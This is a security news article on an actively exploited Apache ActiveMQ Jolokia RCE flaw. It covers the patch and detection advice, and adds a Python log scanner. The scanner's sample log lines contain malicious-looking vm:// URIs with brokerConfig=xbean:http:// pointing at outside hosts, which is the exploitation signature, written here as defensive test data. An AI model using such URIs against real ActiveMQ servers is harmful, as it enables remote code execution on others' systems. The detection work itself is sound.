13-Year-Old Apache ActiveMQ RCE Now Under Active Exploitation — Patch Now
A 13-year-old remote code execution vulnerability in Apache ActiveMQ has been added to CISA's Known Exploited Vulnerabilities (KEV) Catalog after threat actors were confirmed actively exploiting it in the wild. The flaw, tracked as CVE-2026-34197, was patched in March 2026 — but remained undetected in production environments for over a decade.
What Happened
Horizon3 AI researcher Naveen Sunkavally discovered the vulnerability with help from a Claude AI assistant. The root cause: improper input validation in the Jolokia JMX interface, allowing authenticated attackers to inject arbitrary commands. Apache released patches for ActiveMQ Classic versions 6.2.3 and 5.19.4 on March 30. ShadowServer is currently tracking more than 7,500 exposed ActiveMQ servers online. On April 16, CISA ordered FCEB agencies to patch by April 30 under BOD 22-01 and confirmed active exploitation.
Why It Matters
ActiveMQ is one of the most widely deployed open-source message brokers in the world — it underpins asynchronous communication in everything from financial services to logistics to cloud infrastructure. A 13-year runway means this flaw could have been present in some of the most sensitive enterprise environments imaginable. The ShadowServer count of 7,500+ exposed instances is likely a floor, not a ceiling, given internal-facing deployments.
What Defenders Do
Treat this as P0 patching. Horizon3 provides a clear detection hook: search broker logs for connections using the brokerConfig=xbean:http:// query parameter combined with the VM transport protocol — that is the exploitation signature. If you cannot patch immediately, consider network-isolating ActiveMQ management interfaces (the Jolokia JMX endpoint is the attack surface) and disabling untrusted broker connections. Horizon3's full advisory includes indicators of compromise and network-based detection logic.
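The detection hook above, turned into a log check, as an added example (not Horizon3's or the ActiveMQ project's own code): it flags only URIs that use the VM transport scheme and carry a brokerConfig value pointing at a remote xbean location. The sample log lines are constructed; the vm://&lt;broker&gt;?brokerConfig=xbean:&lt;location&gt; URI form is ActiveMQ's real VM transport syntax, and matching https:// as well as the http:// form named in the advisory is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample broker log lines. The surrounding log text is
# invented; only the vm:// URI syntax reflects real ActiveMQ usage.
SAMPLE_LOG = """\
2026-04-17 10:01:02,113 INFO  Connector vm://localhost started
2026-04-17 10:02:15,442 INFO  Connection from tcp://10.0.0.5:51234 (client=app-1)
2026-04-17 10:03:40,007 WARN  Establishing transport vm://broker1?brokerConfig=xbean:http://198.51.100.23/remote.xml
2026-04-17 10:04:01,850 INFO  Establishing transport vm://broker2?brokerConfig=xbean:file:conf/activemq.xml
2026-04-17 10:05:12,301 INFO  Connection from tcp://10.0.0.9:61616?brokerConfig=xbean:http://203.0.113.7/x.xml
"""

# Any transport URI token, so the scheme check happens in code, not in the regex.
URI_RE = re.compile(r"[a-z]+://[^\s\"']+", re.IGNORECASE)

# Assumption: https:// is treated the same as the http:// form the advisory names.
REMOTE_XBEAN_RE = re.compile(r"xbean:https?://", re.IGNORECASE)


def is_remote_xbean_config(uri: str) -> bool:
    """True only for a VM-transport URI whose brokerConfig loads xbean config over HTTP(S)."""
    parts = urlsplit(uri)
    if parts.scheme.lower() != "vm":          # must be the VM transport protocol
        return False
    for value in parse_qs(parts.query).get("brokerConfig", []):
        if REMOTE_XBEAN_RE.match(value):
            return True
    return False


def find_suspicious_lines(log_text: str) -> list:
    """Return (line_number, uri) for every line carrying a remote-xbean VM transport URI."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for uri in URI_RE.findall(line):
            if is_remote_xbean_config(uri):
                hits.append((lineno, uri))
    return hits


if __name__ == "__main__":
    for lineno, uri in find_suspicious_lines(SAMPLE_LOG):
        print(f"line {lineno}: {uri}")
```

Only line 3 of the sample is reported: line 4 loads its config from a local file, and line 5 carries the parameter on a tcp:// connection rather than the VM transport.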
What It Signals
Two trends converge here. First: AI-assisted vulnerability research is producing discoveries that would have taken far longer manually — including deep historical bugs hiding in widely used software. Second: the window between patch release and active exploitation continues to compress. CISA's KEV addition confirms that threat actors moved on this within days of disclosure, not weeks. Organizations running any version of ActiveMQ Classic should assume they are in scope for targeting and act accordingly.
References
CVE-2026-34197 — NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-34197
CISA KEV Catalog: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Horizon3 Advisory: https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/
Apache Security Advisory: https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt